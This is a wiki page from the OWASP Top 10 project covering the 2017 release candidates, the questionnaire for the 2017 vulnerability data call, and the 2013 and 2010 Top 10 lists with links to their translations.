   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
